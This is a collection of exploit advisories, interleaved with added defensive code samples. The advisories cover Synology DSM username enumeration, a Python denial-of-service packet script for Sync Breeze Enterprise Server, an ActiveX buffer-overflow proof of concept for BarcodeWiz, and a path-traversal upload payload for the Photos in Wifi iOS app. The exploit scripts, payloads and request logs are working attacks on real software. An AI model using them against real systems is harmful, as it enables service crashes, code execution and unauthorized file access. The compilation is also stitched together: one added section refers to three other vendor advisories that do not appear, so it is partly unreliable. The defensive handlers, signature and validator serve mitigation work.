# Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
# Date: 01/05/2018
# Exploit Author: Steve Kaun
# Vendor Homepage: https://www.synology.com
# Version: Before 6.1.3-15152
# CVE : CVE-2017-9554
Previously this was identified by the developer, and the disclosure states that "via unspecified vectors" it is possible to enumerate usernames via forget_passwd.cgi.
I haven't identified any other disclosures that actually identified the attack vector, so I figured it would be helpful to others.
"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors."
Well then... Here you go, cracked the code and figured it out.
https://IP_Address:5001/webman/forget_passwd.cgi?user=XXX
Where XXX should be your injection point for username lists.
Several usernames I've found are admin, administrator, root, nobody, ftp, and more. I'm unsure of whether Synology is pulling these entries from its passwd file or not, but there you go.
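What the fix for a user-enumeration oracle in a password-reset endpoint looks like, as an added example that is not Synology's code: the leaky handler answers differently for known and unknown accounts, while the hardened one does the same work and returns the same response either way, so probing `forget_passwd.cgi?user=XXX` with a wordlist learns nothing. The account list, the mail hook and the rate-limit threshold are constructed assumptions:

```python
import secrets
from collections import defaultdict

# Constructed account store; on DSM this would be the passwd database.
KNOWN_USERS = {"admin", "root", "nobody", "ftp"}
OUTBOX = []                    # stands in for the mail sender: (user, token)

def leaky_forget_password(user):
    """Enumeration oracle: status and body reveal whether the account exists."""
    if user not in KNOWN_USERS:
        return {"status": 404, "msg": "No such user"}
    OUTBOX.append((user, secrets.token_urlsafe(24)))
    return {"status": 200, "msg": "Reset mail sent"}

def hardened_forget_password(user):
    """Same status, same body and the same work for any input."""
    token = secrets.token_urlsafe(24)          # generated regardless, keeps timing even
    if user in KNOWN_USERS:
        OUTBOX.append((user, token))           # only a real account receives the mail
    return {"status": 200,
            "msg": "If the account exists, a reset link has been sent to its e-mail address."}

# Enumeration needs many requests: throttle per client on top of the uniform reply.
ATTEMPTS = defaultdict(int)
MAX_ATTEMPTS = 5                               # assumed per-client budget per window

def rate_limited_forget_password(user, client_ip):
    ATTEMPTS[client_ip] += 1
    if ATTEMPTS[client_ip] > MAX_ATTEMPTS:
        return {"status": 429, "msg": "Too many requests"}
    return hardened_forget_password(user)

def oracle_leaks(handler, known, unknown):
    """True when the handler's responses differ between a known and an unknown user."""
    return handler(known) != handler(unknown)

if __name__ == "__main__":
    print("leaky:", oracle_leaks(leaky_forget_password, "admin", "zzz_no_such_user"))
    print("hardened:", oracle_leaks(hardened_forget_password, "admin", "zzz_no_such_user"))
```

The uniform reply is the essential part; the limiter only raises the cost of the wordlist run, and in a real deployment it would key on a sliding window rather than a bare counter.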
# Exploit Title: Sync Breeze Enterprise Server v10.1.16 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v10.1.16.exe
# Version: v10.1.16
# Category: Windows Remote DOS
# CVE: CVE-2017-15664
# Author Twitter: @eln1x
# Description: In Sync Breeze Enterprise Server v10.1.16, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9121.
import socket
target = "192.168.72.231"
port = 9121
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
    data = s.recv(100)
    print data
except:
    print "K1LL3D"
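The four Flexense advisories above (VX Search, Disk Pulse, DiskBoss and Sync Breeze) share one packet layout: a fixed 4-byte header, a few option bytes, then the `SERVER_GET_INFO` command name, sent to each product's control port. A network-side signature built only from those visible constants, as an added example that is not part of the advisories: it matches the header and command in a TCP payload and maps the destination port to the product each advisory names. Because legitimate clients presumably send the same command, this identifies control-protocol traffic to hunt over or baseline, not the crafted packet itself; the sample flows are constructed and do not reproduce the advisories' option bytes:

```python
# Added example: spot SERVER_GET_INFO control requests as seen in the four DoS scripts.
MAGIC = b"\x75\x19\xba\xab"          # first four bytes of every packet in the scripts
COMMAND = b"SERVER_GET_INFO"

# Control ports as listed in the advisories
CONTROL_PORTS = {
    9123: "VX Search Enterprise Server",
    9120: "Disk Pulse Enterprise Server",
    8094: "DiskBoss Enterprise Server",
    9121: "Sync Breeze Enterprise Server",
}

def is_get_info_request(payload):
    """True when the TCP payload starts with the header and carries the command name."""
    return payload.startswith(MAGIC) and COMMAND in payload[len(MAGIC):]

def classify(dst_port, payload):
    """Product name for a SERVER_GET_INFO request on a known control port,
    'unknown-port' when the signature matches on another port, None otherwise."""
    if not is_get_info_request(payload):
        return None
    return CONTROL_PORTS.get(dst_port, "unknown-port")

def scan_flows(flows):
    """flows: iterable of (src, dst_port, payload). Returns (src, dst_port, product)
    for every matching flow, one record per flow for an IDS or SIEM log."""
    hits = []
    for src, dst_port, payload in flows:
        product = classify(dst_port, payload)
        if product is not None:
            hits.append((src, dst_port, product))
    return hits

# Constructed payloads: header, sixteen zero option bytes, a command name, a
# terminator. Only the header and the command name take part in matching.
SAMPLE_GET_INFO = MAGIC + b"\x00" * 16 + COMMAND + b"\x00"
SAMPLE_OTHER_CMD = MAGIC + b"\x00" * 16 + b"EXAMPLE_COMMAND" + b"\x00"

SAMPLE_FLOWS = [
    ("10.0.0.7", 9120, SAMPLE_GET_INFO),
    ("10.0.0.8", 80, b"GET / HTTP/1.1\r\n"),
    ("10.0.0.7", 9123, SAMPLE_OTHER_CMD),
    ("10.0.0.7", 9121, SAMPLE_GET_INFO),
]

if __name__ == "__main__":
    for hit in scan_flows(SAMPLE_FLOWS):
        print("%s -> %d  %s" % hit)
```

The practical mitigation is the same for all four products: the control port should not be reachable from anything but the administration hosts, and a burst of these requests from an unexpected source is the signal worth alerting on.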
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BARCODEWIZ-v6.7-ACTIVEX-COMPONENT-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.barcodewiz.com
Product:
=============
BarcodeWiz ActiveX Control < 6.7
BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes;
Choose from hundreds of label layouts; Export as PDF or XPS.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
CVE-2018-5221
Security Issue:
================
The BottomText and TopText properties of BarcodeWiz.DLL suffer from a buffer overflow vulnerability resulting in a Structured Exception Handler (SEH) overwrite.
This can be exploited by a remote attacker to potentially execute arbitrary attacker-supplied code. The user would have to visit a malicious webpage using
Internet Explorer, where the exploit could be triggered.
SEH chain of main thread
Address SE handler
0018DAC0 kernel32.754E48F3
0018EE34 41414141
41414141 *** CORRUPT ENTRY ***
Exception Code: ACCESS_VIOLATION
Disasm: 2045665 MOV [EDX+ECX],AL (BarcodeWiz.DLL)
SEH Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
BarcodeWiz.2045665 BarcodeWiz.202FF50
BarcodeWiz.202FF50 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Exploit/POC:
=============
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' />
<script language='vbscript'>
PAYLOAD=String(12308, "A")
VICTIM.BottomText = PAYLOAD
</script>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: December 26, 2017
Vendor Acknowledgement: January 2, 2018
Vendor "updated version released this week." : January 2, 2018
January 6, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Document Title:
===============
Photos in Wifi 1.0.1 iOS - Path Traversal Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1600
Release Date:
=============
2018-01-04
Vulnerability Laboratory ID (VL-ID):
====================================
1600
Common Vulnerability Scoring System:
====================================
6.5
Vulnerability Class:
====================
Directory- or Path-Traversal
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Share the photos and videos of your iPhone/iPad over wifi. Upload photos and videos right to your camera roll without iTunes.
With Photos In Wifi, you can share your whole camera roll, an album, or a selection of photos and videos. Once the app
server is started, you can view, play and download the shared photos and videos from any computer or smartphone web browser.
You can also upload a photo, a video, or a zip file containing hundreds of photos and videos, right into your iPhone/iPad
camera roll. You can also use Photos In Wifi to send multiple full-resolution photos and videos in a single email or MMS.
(Copy of the Homepage: https://itunes.apple.com/us/app/photos-in-wifi-share-photos/id966316576 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a path traversal web vulnerability in the Photos in Wifi v1.0.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2018-01-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sebastien BUET
Product: Photos In Wifi - iOS Mobile (Web-Application) 1.0.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the official Photos in Wifi v1.0.1 iOS mobile web-application.
The vulnerability allows remote attackers to gain unauthorized access to other folders of the mobile application and to compromise it
by uploading malicious content.
The vulnerability is located in the `Select a photo or a video to upload` module. Remote attackers are able to intercept the upload
POST request and manipulate the vulnerable filename value to compromise the mobile app. The encoding of the ext value and the parsing
of the filename value are broken, which results in this unexpected behaviour. The injection point of the issue is the filename value
of the upload POST request. The execution point occurs in the assets.php file when it processes the images or videos for display.
The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the remote web vulnerability requires no user interaction and no privileged web application user account.
Successful exploitation of the file upload vulnerability results in web-server, web module, website or dbms compromise.
Vulnerable Module(s):
[+] ./assets-library://asset/
Vulnerable File(s):
[+] asset.php
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
Manual steps to reproduce the vulnerability ...
1. Start the web-server (wifi)
2. Go to another computer and log in by requesting the http localhost URL
3. Click upload and choose a random file
4. Start a live session tamper for http
5. Submit the upload to continue with the POST method request
6. Inject into the filename value a payload and path as extension
7. Continue to replay the request
8. The server responds with 200 OK
9. Open the poc url of the path to execute the malicious content and compromise the app
10. Successful reproduction of the vulnerability!
PoC: URL
http://localhost/assets-library://asset/asset.php?id=40C9C332-857B-4CB8-B848-59A30AA9CF3B&ext=[../not_allowed_directory/].[ext]
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
POST-Daten:
POST_DATA[-----------------------------191201034430987
Content-Disposition: form-data; name="file"; filename="../not_allowed_directory/newfile.[ext]"
-
Status: 200[OK]
GET http://localhost/assets-library://asset/asset.php?id=250D47DB-57DD-47E4-B72A-CD4455B06277&ext=php
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
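The defect described above is an upload handler that trusts the multipart `filename` and the `ext` parameter as path components. A validation routine that closes both holes, as an added example that is not the app's code: the filename must be a single path component with no separators or leading dot and an allow-listed extension, the `ext` parameter is allow-listed on its own, and the resolved target is re-checked against the upload root before anything is written. The upload root, the extension list and the sample names are assumptions:

```python
import os
import re

# Added example. The upload root and the extension allow-list are assumptions.
UPLOAD_ROOT = "/var/app/camera_roll"
ALLOWED_EXT = {"jpg", "jpeg", "png", "heic", "gif", "mov", "mp4", "zip"}
# One leading alphanumeric, then a bounded run of safe characters: no '/', no '\\',
# no leading '.', so neither '..' nor a hidden file such as .htaccess gets through.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")
SAFE_EXT = re.compile(r"[a-z0-9]{1,8}")

def validate_ext(ext):
    """For a query parameter such as asset.php?ext=...: shape check plus allow-list."""
    e = ext.strip().lower()
    return bool(SAFE_EXT.fullmatch(e)) and e in ALLOWED_EXT

def validate_upload(filename):
    """Validate a multipart filename; return (True, target path) or (False, reason)."""
    name = filename.replace("\\", "/")
    if "/" in name:
        return False, "filename contains a path component"
    if not SAFE_NAME.fullmatch(name):
        return False, "filename contains disallowed characters"
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if not validate_ext(ext):
        return False, "extension not allowed"
    target = os.path.normpath(os.path.join(UPLOAD_ROOT, name))
    # Belt and braces: even after the checks above, refuse anything that resolves
    # outside the upload root.
    if os.path.commonpath([UPLOAD_ROOT, target]) != UPLOAD_ROOT:
        return False, "resolved path escapes the upload root"
    return True, target

# Constructed names; the second mirrors the shape of the advisory's payload.
SAMPLE_NAMES = [
    "IMG_0001.JPG",
    "../not_allowed_directory/newfile.php",
    "..\\..\\etc\\passwd",
    ".htaccess",
    "clip.mov",
    "shell.php",
]

def triage(names):
    """Map each candidate filename to its validation result."""
    return {n: validate_upload(n) for n in names}

if __name__ == "__main__":
    for name, result in triage(SAMPLE_NAMES).items():
        print("%-40s %s" % (name, result))
```

Stripping the directory part with `basename()` alone would silently turn the advisory's payload into `newfile.php`; rejecting the request outright, as above, also gives the log entry a defender wants to see.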
Security Risk:
==============
The security risk of the web vulnerability in the wifi interface upload post method request is estimated as high (CVSS 6.5).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.